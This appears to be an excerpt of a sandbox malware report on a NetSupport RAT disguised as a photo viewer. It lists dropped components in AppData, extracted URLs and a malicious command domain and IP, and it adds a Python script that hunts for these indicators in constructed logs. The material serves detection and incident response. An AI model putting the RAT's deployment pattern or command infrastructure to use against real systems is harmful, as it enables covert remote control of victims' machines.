                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcichek.dll | 3% | ReversingLabs |
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicl32.dll | 3% | ReversingLabs |
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exe | 3% | ReversingLabs |
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\tcctl32.dll | 3% | ReversingLabs |
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\zxing.dll | 13% | ReversingLabs |
                                No Antivirus matches
                                No Antivirus matches
Source | Detection | Scanner | Label
http://www.divx.com;;;YUV;4:2:0 | 0% | Avira URL Cloud | safe
http://www.fourcc.org/indexyuv.htm;;;YUV; | 0% | Avira URL Cloud | safe
http://www.r-wipe.comListBox | 0% | Avira URL Cloud | safe
http://ffdshow-tryout.sourceforge.net/;;; | 0% | Avira URL Cloud | safe
http://www.winnov.com/ | 0% | Avira URL Cloud | safe
http://www.isky.co.kr/html/cs/download.jsp | 0% | Avira URL Cloud | safe
http://mirror01.iptelecom.net.ua/~video/codecs/PICVideo.MJPG.v2.10.27.codec.exe | 0% | Avira URL Cloud | safe
http://mirror01.iptelecom.net.ua/~video/codecs/miroVIDEO-XL.codec.v2.2.exe | 0% | Avira URL Cloud | safe
http://mirror01.iptelecom.net.ua/~video/codecs/LEAD.MCMP-JPEG.v1.016.codec.exe | 0% | Avira URL Cloud | safe
http://base.fims.tv | 0% | Avira URL Cloud | safe
http://www.smpte-ra.org/schemas/2067-2/2016/PKL | 0% | Avira URL Cloud | safe
http://www.speex.org/ | 0% | Avira URL Cloud | safe
http://mirror01.iptelecom.net.ua/~video/codecs/Autodesk.Animator.v1.11.Codec.exe;;; | 0% | Avira URL Cloud | safe
http://www.iis.fraunhofer.de/amm/index.html; | 0% | Avira URL Cloud | safe
http://mediaxw.sourceforge.net;;;YUV | 0% | Avira URL Cloud | safe
http://www.free-codecs.com/download/Alparysoft_Lossless_Video_Codec.htm;;; | 0% | Avira URL Cloud | safe
http://www.pbcore.org/PBCore/PBCoreXSD_Ver_1-2-1.xsdhttp://www.pbcore.org/PBCore/PBCoreNamespace.htm | 0% | Avira URL Cloud | safe
http://world.casio.com/;Casio | 0% | Avira URL Cloud | safe
http://www.lucasarts.com/ | 0% | Avira URL Cloud | safe
https://www.3delite.hu/Secondary%20Display%20Photo%20Viewer/Privacy%20policy.txtopenU | 0% | Avira URL Cloud | safe
http://www.smpte-ra.org/schemas/2067-2/2013http://www.smpte-ra.org/schemas/2067-2/XXXXhttp://www.smp | 0% | Avira URL Cloud | safe
https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/DownloadSecondaryDisplayPhotoViewer.h | 0% | Avira URL Cloud | safe
http://eMajix.com | 0% | Avira URL Cloud | safe
http://www.real.com;;; | 0% | Avira URL Cloud | safe
http://www.streambox.com/products/act-L2_codec.htm | 0% | Avira URL Cloud | safe
http://mirror01.iptelecom.net.ua/~video/codecs/Avid.VfW.codec.v2.0d2.exe;;;YUV | 0% | Avira URL Cloud | safe
http://eMajix.com;;; | 0% | Avira URL Cloud | safe
http://www.vorbis.com;;Mode | 0% | Avira URL Cloud | safe
http://www.real.com;LC | 0% | Avira URL Cloud | safe
http://description.fims.tv | 0% | Avira URL Cloud | safe
http://www.cinepak.com/text.html;;; | 0% | Avira URL Cloud | safe
http://freeimage.sourceforge.net | 0% | Avira URL Cloud | safe
http://www.fourcc.org/indexyuv.htm;;;YUV;4:1:1 | 0% | Avira URL Cloud | safe
http://www.smpte.org/;;;YUV | 0% | Avira URL Cloud | safe
http://www.theora.com | 0% | Avira URL Cloud | safe
http://www.digicine.com/PROTO-ASDCP-AM-20040311# | 0% | Avira URL Cloud | safe
http://www.on2.com/vp7.php3;;; | 0% | Avira URL Cloud | safe
http://www.vorbis.com/;Lossy | 0% | Avira URL Cloud | safe
http://mysif.ru/SIF1_dd_Eng.htm;;; | 0% | Avira URL Cloud | safe
http://dividix.host.sk | 0% | Avira URL Cloud | safe
http://ffdshow.sourceforge.net/tikiwiki/tiki-index.php?page=Getting | 0% | Avira URL Cloud | safe
http://www.musepack.net;Lossy | 0% | Avira URL Cloud | safe
https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/filesystemdialogs.htmlopenU | 0% | Avira URL Cloud | safe
http://www.adobe.fr/products/encore/;Lossless | 0% | Avira URL Cloud | safe
http://ffdshow-tryout.sourceforge.net/;;;YUV;4:2:0 | 0% | Avira URL Cloud | safe
http://www.winnov.com/;;; | 0% | Avira URL Cloud | safe
http://geo.netsupportsoftware.comlocation/loca.asp | 0% | Avira URL Cloud | safe
http://www.smpte-ra.org/schemas/2067-2/2013 | 0% | Avira URL Cloud | safe
http://www.iis.fraunhofer.de/amm/index.html;;Version | 0% | Avira URL Cloud | safe
https://secure.r-tt.com/UserConsole.shtmlopen | 0% | Avira URL Cloud | safe
http://www.array.com | 0% | Avira URL Cloud | safe
http://winace.com | 0% | Avira URL Cloud | safe
http://mirror01.iptelecom.net.ua/~video/codecs/CUseeMe.JPEG.CODEC.v1.17.exe | 0% | Avira URL Cloud | safe
http://www.real.com;;;;;;Lossless | 0% | Avira URL Cloud | safe
http://www.nerodigital.com | 0% | Avira URL Cloud | safe
http://mirror01.iptelecom.net.ua/~video/codecs/PICVideo.Lossless.JPEG.codec.v2.10.27.exe;;;YUV | 0% | Avira URL Cloud | safe
http://pbcore.org/xsd/pbcore-2.0.xsdhttp://www.pbcore.org/PBCore/PBCoreNamespace.html | 0% | Avira URL Cloud | safe
http://www.digitalvoodoo.net/;;; | 0% | Avira URL Cloud | safe
https://www.r-wipe.com/#win-touchhttps://secure.r-tt.com/cgi-bin/Store?P=513mailto:sales | 0% | Avira URL Cloud | safe
http://www.q-team.de;;; | 0% | Avira URL Cloud | safe
http://mediaxw.sourceforge.net | 0% | Avira URL Cloud | safe
https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/filesystemdialogs.html | 0% | Avira URL Cloud | safe
http://www.playon.tv/playlater | 0% | Avira URL Cloud | safe
http://www.cineform.com/products/ConnectHD.htm | 0% | Avira URL Cloud | safe
http://www.digicine.com/PROTO-ASDCP-PKL-20040311#http://www.smpte-ra.org/schemas/429-8/2007/PKLhttp: | 0% | Avira URL Cloud | safe
http://amamaman.hp.infoseek.co.jp/english/amv2_e.html;;; | 0% | Avira URL Cloud | safe
http://quoteunquoteapps.comhttp://basicrecipe.comCopyright | 0% | Avira URL Cloud | safe
http://ffdshow-tryout.sourceforge.net/ | 0% | Avira URL Cloud | safe
http://diracvideo.org/ | 0% | Avira URL Cloud | safe
http://www.fourcc.org/indexrgb.htm;;;RGB | 0% | Avira URL Cloud | safe
http://www.webmproject.org;;;YUV;4:2:0 | 0% | Avira URL Cloud | safe
http://www.chiariglione.org/mpeg/technologies/mp04-sls/index.htm;Lossless | 0% | Avira URL Cloud | safe
http://eprints.ecs.soton.ac.uk/archive/00001310/01/VTC97-js.pdf | 0% | Avira URL Cloud | safe
http://www.cyberlink.com;;; | 0% | Avira URL Cloud | safe
http://www.nue.tu-berlin.de/forschung/projekte/lossless/mp4als.html#downloads | 0% | Avira URL Cloud | safe
http://mirror01.iptelecom.net.ua/~video/codecs/Pinnacle.ReelTime.v2.5.software.only.codec.exe;;;YUV | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
dirklend.com | 162.33.178.193 | true | true | | unknown
geo.netsupportsoftware.com | 104.26.1.231 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://geo.netsupportsoftware.com/location/loca.asp | false | | high
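Read together, the tables above describe one deployment pattern: the NetSupport Manager client components (pcicl32.dll, pcichek.dll, pcicapi.dll, htctl32.dll, tcctl32.dll, remcmdstub.exe) written to a user-writable directory under AppData next to a renamed host executable (DisplayPhotoViewer.exe), a request to geo.netsupportsoftware.com/location/loca.asp, which the report rates non-malicious with high reputation because it is the vendor's own geolocation check, and contact with dirklend.com / 162.33.178.193, which the report marks malicious. The static vendor verdicts are weak evidence here: the only label, Win32.Trojan.LummaStealer from ReversingLabs at 16%, disagrees with the behavioural classification (NetSupport RAT), so triage should rest on the dropped-component set plus the network contacts. The script below is an added example, not part of the Joe Sandbox report and not NetSupport's or any product's code: it correlates exactly those indicators over a hypothetical, constructed log schema (FILE_CREATE / DNS / NET lines) and assumes that a legitimate NetSupport Manager install lives under Program Files, so the same component set anywhere else is what gets flagged.

```python
"""Hunt for the NetSupport RAT deployment pattern recorded in this sandbox report.
Added example, not part of the Joe Sandbox report. Component names, the drop
directory, domains and IP come from the report's tables; the log schema and the
log lines below are constructed for illustration."""
import re
from collections import defaultdict

# NetSupport Manager client components from the report's dropped-files table.
NETSUPPORT_COMPONENTS = {
    "pcicl32.dll", "pcichek.dll", "pcicapi.dll",
    "htctl32.dll", "tcctl32.dll", "remcmdstub.exe",
}
# Network indicators from the report's domain and contacted-URL tables.
GEO_CHECK_HOST = "geo.netsupportsoftware.com"  # vendor geo check: benign on its own
MALICIOUS_DOMAINS = {"dirklend.com"}           # flagged malicious in the report
MALICIOUS_IPS = {"162.33.178.193"}             # address dirklend.com resolved to

# Assumption: a legitimate NetSupport Manager install lives under Program Files;
# the same component set under a user-writable path is what we flag.
STANDARD_INSTALL_PREFIXES = ("c:\\program files\\", "c:\\program files (x86)\\")

# Hypothetical log schema for this example (not a real product's format):
#   FILE_CREATE <process> <path>  |  DNS <process> <query>  |  NET <process> <dst_ip>
FILE_CREATE_RE = re.compile(r"^FILE_CREATE\s+(?P<proc>\S+)\s+(?P<path>.+?)\s*$")
DNS_RE = re.compile(r"^DNS\s+(?P<proc>\S+)\s+(?P<query>\S+)\s*$")
NET_RE = re.compile(r"^NET\s+(?P<proc>\S+)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s*$")


def is_standard_install_dir(directory):
    return directory.lower().startswith(STANDARD_INSTALL_PREFIXES)


def find_netsupport_dirs(lines, min_components=3):
    """Map each directory that received >= min_components of the client set
    to the sorted list of component names written there."""
    by_dir = defaultdict(set)
    for line in lines:
        m = FILE_CREATE_RE.match(line)
        if not m:
            continue  # lines that do not match the schema are ignored
        directory, _, name = m.group("path").rpartition("\\")
        if name.lower() in NETSUPPORT_COMPONENTS:
            by_dir[directory].add(name.lower())
    return {d: sorted(n) for d, n in by_dir.items() if len(n) >= min_components}


def find_network_iocs(lines):
    """Return (kind, process, indicator) for DNS/NET lines that hit the report's IOCs."""
    hits = []
    for line in lines:
        m = DNS_RE.match(line)
        if m:
            query = m.group("query").lower().rstrip(".")
            if query == GEO_CHECK_HOST:
                hits.append(("geo-check", m.group("proc"), query))
            elif query in MALICIOUS_DOMAINS:
                hits.append(("malicious-domain", m.group("proc"), query))
            continue
        m = NET_RE.match(line)
        if m and m.group("ip") in MALICIOUS_IPS:
            hits.append(("malicious-ip", m.group("proc"), m.group("ip")))
    return hits


def triage(lines, min_components=3):
    """Correlate file drops with network IOCs; the geo check alone is not enough."""
    all_dirs = find_netsupport_dirs(lines, min_components)
    suspicious_dirs = {d: n for d, n in all_dirs.items() if not is_standard_install_dir(d)}
    network = find_network_iocs(lines)
    kinds = {kind for kind, _, _ in network}
    if suspicious_dirs and "geo-check" in kinds:
        verdict = "netsupport-rat-likely"  # client outside Program Files that checked in
    elif suspicious_dirs or kinds & {"malicious-domain", "malicious-ip"}:
        verdict = "review"
    else:
        verdict = "clean"  # covers a Program Files install that only did the geo check
    return {"verdict": verdict, "suspicious_dirs": suspicious_dirs, "network": network}


# Constructed sample: the report's drop directory and components, a Program Files
# install for contrast, and the report's network contacts.
SAMPLE_LOG = r"""
FILE_CREATE Merge.exe C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe
FILE_CREATE Merge.exe C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicl32.dll
FILE_CREATE Merge.exe C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcichek.dll
FILE_CREATE Merge.exe C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\htctl32.dll
FILE_CREATE Merge.exe C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exe
FILE_CREATE msiexec.exe C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicl32.dll
FILE_CREATE msiexec.exe C:\Program Files (x86)\NetSupport\NetSupport Manager\pcichek.dll
FILE_CREATE msiexec.exe C:\Program Files (x86)\NetSupport\NetSupport Manager\htctl32.dll
DNS DisplayPhotoViewer.exe geo.netsupportsoftware.com
DNS DisplayPhotoViewer.exe dirklend.com
NET DisplayPhotoViewer.exe 162.33.178.193
DNS chrome.exe www.example.com
""".strip().splitlines()

if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```

The threshold of three components keeps a single stray DLL from firing, and the Program Files exclusion is what separates this from a legitimate NetSupport Manager deployment, which also contacts the geo check; adjust both to your estate before running it over real telemetry.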
Name | Source | Malicious | Antivirus Detection | Reputation
http://mirror01.iptelecom.net.ua/~video/codecs/LEAD.MCMP-JPEG.v1.016.codec.exe | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fourcc.org/indexyuv.htm;;;YUV; | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.isky.co.kr/html/cs/download.jsp | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://%s/testpage.htmwininet.dll | DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.dolby.com/consumer/technology/trueHD.html | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | | high
http://ffdshow-tryout.sourceforge.net/;;; | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.divx.com;;;YUV;4:2:0 | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.r-wipe.comListBox | Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3154572548.0000000068B3F000.00000002.00000001.01000000.0000000D.sdmp, RwcTouch.dll.0.dr | false | Avira URL Cloud: safe | unknown
http://www.winnov.com/ | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://mirror01.iptelecom.net.ua/~video/codecs/PICVideo.MJPG.v2.10.27.codec.exe | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://base.fims.tv | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://mirror01.iptelecom.net.ua/~video/codecs/miroVIDEO-XL.codec.v2.2.exe | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.smpte-ra.org/schemas/2067-2/2016/PKL | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.speex.org/ | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://%s/testpage.htm | DisplayPhotoViewer.exe, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2939650660.000000000A728000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A532000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.iis.fraunhofer.de/amm/index.html; | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lucasarts.com/ | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
https://resolume.com/software/codec;;Version | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | | high
http://www.indyproject.org/ | DisplayPhotoViewer.exe, 00000006.00000002.3097931052.00000000029F4000.00000004.00001000.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmp | false | | high
http://mirror01.iptelecom.net.ua/~video/codecs/Autodesk.Animator.v1.11.Codec.exe;;; | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://sourceforge.net/project/showfiles.php?group_id=82303&package_id=84358 | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | | high
http://www.pbcore.org/PBCore/PBCoreXSD_Ver_1-2-1.xsdhttp://www.pbcore.org/PBCore/PBCoreNamespace.htm | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
https://www.blackmagicdesign.com/products/blackmagicraw;XQ;; | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | | high
http://world.casio.com/;Casio | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.free-codecs.com/download/Alparysoft_Lossless_Video_Codec.htm;;; | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
https://www.3delite.hu/Secondary%20Display%20Photo%20Viewer/Privacy%20policy.txtopenU | DisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmp | false | Avira URL Cloud: safe | unknown
http://mediaxw.sourceforge.net;;;YUV | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.smpte-ra.org/schemas/2067-2/2013http://www.smpte-ra.org/schemas/2067-2/XXXXhttp://www.smp | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/DownloadSecondaryDisplayPhotoViewer.h | DisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmp | false | Avira URL Cloud: safe | unknown
https://mediaarea.net/temp/baseMediaService-V1_1_0.xsd | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | | high
http://eMajix.com | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://mirror01.iptelecom.net.ua/~video/codecs/Avid.VfW.codec.v2.0d2.exe;;;YUV | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.streambox.com/products/act-L2_codec.htm | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.real.com;;; | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://eMajix.com;;; | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://standards.iso.org/ittf/PubliclyAvailableStandards/MPEG-7_schema_files/mpeg7-v2.xsd | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | | high
http://www.iso.org/;JPEG | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | | high
http://www.real.com | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | | high
http://www.vorbis.com;;Mode | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.real.com;LC | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://description.fims.tv | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://mediaarea.net/XVID;;;YUV;4:2:0 | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | | high
http://www.cinepak.com/text.html;;; | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://freeimage.sourceforge.net | DisplayPhotoViewer.exe, 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fourcc.org/indexyuv.htm;;;YUV;4:1:1 | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.smpte.org/;;;YUV | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.theora.com | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.on2.com/vp7.php3;;; | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://dividix.host.sk | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cyberlink.com | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | | high
http://www.digicine.com/PROTO-ASDCP-AM-20040311# | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.vorbis.com/;Lossy | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://mysif.ru/SIF1_dd_Eng.htm;;; | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/ | DisplayPhotoViewer.exe, 00000006.00000000.2549148918.0000000000AFE000.00000020.00000001.01000000.00000005.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3237762123.000000006B4D1000.00000020.00000001.01000000.00000006.sdmp | false | | high
http://ffdshow.sourceforge.net/tikiwiki/tiki-index.php?page=Getting | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.loc.gov/mix/v20xmlns:mixhttp://www.loc.gov/mix/v20 | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | | high
http://127.0.0.1 | DisplayPhotoViewer.exe, DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp | false | | high
http://www.musepack.net;Lossy | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
https://www.3delite.hu/Object%20Pascal%20Developer%20Resources/filesystemdialogs.htmlopenU | DisplayPhotoViewer.exe, 00000006.00000002.3237762123.000000006B4D1000.00000020.00000001.01000000.00000006.sdmp | false | Avira URL Cloud: safe | unknown
http://www.adobe.fr/products/encore/;Lossless | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://ffdshow-tryout.sourceforge.net/;;;YUV;4:2:0 | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://video.google.com/playerdownload.html | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | | high
http://www.macromedia.com/go/getflashplayer | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | | high
http://www.smpte-ra.org/schemas/2067-2/2013 | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
http://www.iis.fraunhofer.de/amm/index.html;;Version | DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | false | Avira URL Cloud: safe | unknown
                                                                          https://secure.r-tt.com/UserConsole.shtmlopenDisplayPhotoViewer.exe, 00000006.00000002.3154572548.0000000068B3F000.00000002.00000001.01000000.0000000D.sdmp, RwcTouch.dll.0.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.winnov.com/;;;DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
